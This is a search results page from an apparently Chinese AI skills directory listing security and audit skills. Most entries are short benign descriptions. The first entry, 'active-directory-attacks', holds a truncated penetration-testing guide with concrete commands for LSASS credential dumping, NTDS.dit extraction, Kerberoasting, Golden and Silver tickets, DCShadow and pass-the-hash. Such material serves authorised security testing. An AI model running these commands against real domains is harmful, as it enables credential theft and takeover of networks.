灵感菇

AI 技能的自然生态,你的一句话,蔓延出无限连接。

搜索结果

全部能力

找到 854 个相关结果 / 认证与权限

安全与治理 / 审核评估

Active Directory 攻击

active-directory-attacks

300

Active Directory 渗透测试技术指南 ## 信息收集 ### 域基础信息 - `nltest /domain_trusts` - 查看域信任关系 - `net view /domain` - 枚举域列表 - `nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>` - 定位域控制器 ### BloodHound 资产发现 ```powershell # SharpHound 数据收集 Invoke-BloodHound -CollectionMethod All -Domain target.com -ZipFileName loot.zip ``` ### LDAP 查询 ```powershell # 查找域管账户 ([adsisearcher]"(&(objectCategory=person)(objectClass=user)(adminCount=1))").FindAll() # 查找非约束委派的服务账户 Get-ADObject -LDAPFilter "(&(userAccountControl:1.2.840.113556.1.4.803:=524288)(samAccountType=805306368))" ``` ## 凭据获取 ### LSASS 内存提取 ```powershell # procdump + mimikatz 离线解析 procdump.exe -accepteula -ma lsass.exe lsass.dmp sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full ``` ### SAM/NTDS.dit 提取 ```powershell # Volume Shadow Copy 方式 vssadmin create shadow /for=C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\loot\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\loot\ # ntdsutil 官方工具 ntdsutil "ac i ntds" "ifm" "create full c:\loot" q q ``` ### Kerberoasting ```powershell # 请求 SPN 服务票据 Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sql01.target.com:1433" # Rubeus 自动化 Rubeus.exe kerberoast /outfile:hashes.txt ``` ## Kerberos 攻击 ### AS-REP Roasting ```powershell # 查找 "Do not require Kerberos preauthentication" 账户 Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth # Rubeus 攻击 Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt ``` ### Golden Ticket ```powershell # 需要 krbtgt 账户的 NTLM hash mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt mimikatz # kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-... /krbtgt:hash /ptt ``` ### Silver Ticket ```powershell # 针对特定服务,需要服务账户 NTLM hash mimikatz # kerberos::golden /user:fakeuser /domain:target.com /sid:S-1-5-21-... /target:sql01.target.com /service:MSSQLSvc /rc4:servicehash /ptt ``` ### DCShadow ```powershell # 需要域管权限,注册伪造 DC mimikatz # lsadump::dcshadow /object:targetuser /attribute:Description /value:"backdoor" ``` ## 横向移动 ### Pass-the-Hash ```powershell # mimikatz sekurlsa::pth /user:admin /domain:target.com /ntlm:hash /run:powershell.exe # Invoke-WMIExec Invoke-WMIExec -Target dc01.target.com -Username admin -Hash hash -Command "powershell -enc ..." ``` ### Over-Pass-the-Hash ```powershell # 获取 TGT 后使用正常 Kerberos 认证 Rubeus.exe asktgt /user:admin /rc4:hash /ptt ``` ### Pass-the-Ticket ```powershell # 导出票据后注入 mimikatz # sekurlsa::tickets /export mimikatz # kerberos::ptt [0;123456]-0-0-40810000-admin@krbtgt-target.com.kirbi ``` ### 约束委派滥用 ```powershell # 配置 S4U2Self + S4U2Proxy Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:admin /msdsspn:cifs/target.target.com /ptt ``` ### 基于资源的约束委派 (RBCD

Stars 0
uiuxtestingsecurity

安全与治理 / 审核评估

provider-pattern

provider-pattern

300

Teaches the provider pattern for sharing data across component trees. Use when multiple nested components need access to the same data and prop drilling…

Stars 202
authproviderpatternteaches

安全与治理 / 审核评估

flyweight-pattern

flyweight-pattern

299

Teaches the flyweight pattern for memory optimization. Use when your application creates large numbers of similar objects and memory consumption is a concern.

Stars 202
authflyweightpatternteaches

安全与治理 / 审核评估

roier-seo

roier-seo

299

Technical SEO auditor and fixer. Runs Lighthouse/PageSpeed audits on websites or local dev servers, analyzes SEO/performance/accessibility scores, and…

Stars 27,327
performanceauditroierseo

安全与治理 / 审核评估

AWS Clean Rooms

aws-cleanrooms

296

排查和调试 AWS Clean Rooms 协作问题,涉及 IAM 角色、S3 存储桶策略、KMS 密钥、Lake Formation 权限和 CloudWatch…

Stars 0
agentdebuggingawscleanrooms

安全与治理 / 审核评估

oauth-implementation

oauth-implementation

296

Guidelines for implementing OAuth 2.0 and OAuth 2.1 authentication flows with security best practices and PKCE

Stars 111
uisecurityauthoauth

安全与治理 / 审核评估

reddit-thread-analyzer

reddit-thread-analyzer

296

Analyze Reddit threads for sentiment, consensus opinions, top arguments, and discussion patterns. Use this when users want to understand Reddit community…

Stars 138
authredditthreadanalyzer

安全与治理 / 审核评估

jira

jira

296

Jira integration. Manage project management and ticketing data, records, and workflows. Use when the user wants to interact with Jira data.

Stars 35
authworkflowjiraintegration

安全与治理 / 审核评估

git-troubleshooting

git-troubleshooting

295

Git troubleshooting techniques including recovering lost commits, fixing merge conflicts, resolving detached HEAD, and diagnosing repository issues. Use when…

Stars 8
uiauthgittroubleshooting

安全与治理 / 审核评估

阿里云安全-KMS测试

alicloud-security-kms-test

295

KMS 技能的最小化冒烟测试。验证认证和只读密钥列表路径。

Stars 0
uisecurityauthapi

安全与治理 / 审核评估

阿里云可观测性-SLS日志查询测试

alicloud-observability-sls-log-query-test

294

SLS 日志查询技能的极简冒烟测试。验证 SDK 认证和单次有界查询。

Stars 0
uiauthalicloudobservability

安全与治理 / 审核评估

alicloud-ai-misc-crawl-and-skill-test

alicloud-ai-misc-crawl-and-skill-test

294

最小化验证爬取与技能工作流的就绪状态。

Stars 0
uiauthworkflowalicloud

安全与治理 / 审核评估

alicloud-network-dns-cli-test

alicloud-network-dns-cli-test

292

阿里云 DNS CLI 技能的最小化冒烟测试。验证 aliyun-cli 认证和 describe-subdomain 流程。

Stars 0
uiauthalicloudnetwork

安全与治理 / 审核评估

clerk-authentication

clerk-authentication

291

Guidelines for implementing Clerk authentication in Next.js applications with middleware, hooks, and security best practices

Stars 111
nextjsuisecurityauth

安全与治理 / 审核评估

azure-functions

azure-functions

290

Create serverless functions on Azure with triggers, bindings, authentication, and monitoring. Use for event-driven computing without managing infrastructure.

Stars 219
uiauthpromptmonitoring

安全与治理 / 审核评估

agent-skills-creator

agent-skills-creator

289

指导创建遵循开放格式规范的最佳实践智能体技能。涵盖前置元数据、目录结构、渐进式披露、…

Stars 0
designuitestingaudit

安全与治理 / 审核评估

getnote-auth

getnote-auth

288

Manage authentication for Get笔记 CLI

Stars 74
authapigetnotemanage

安全与治理 / 审核评估

无障碍访问

accessibility

287

审核并改进网页无障碍性,遵循 WCAG 2.1 指南。用于响应"改进无障碍性"、"a11y 审计"、"WCAG 合规"、"屏幕阅读器…"等请求时。

Stars 0
uiauditaccessibilityand

安全与治理 / 审核评估

load-issues

load-issues

287

Load all open issues from GitHub and save them as markdown files

Stars 999
authsqlgithubload

安全与治理 / 审核评估

getnote-search

getnote-search

287

Semantic search across notes in Get笔记 via the getnote CLI

Stars 74
uiauthgetnotesearch

25 / 43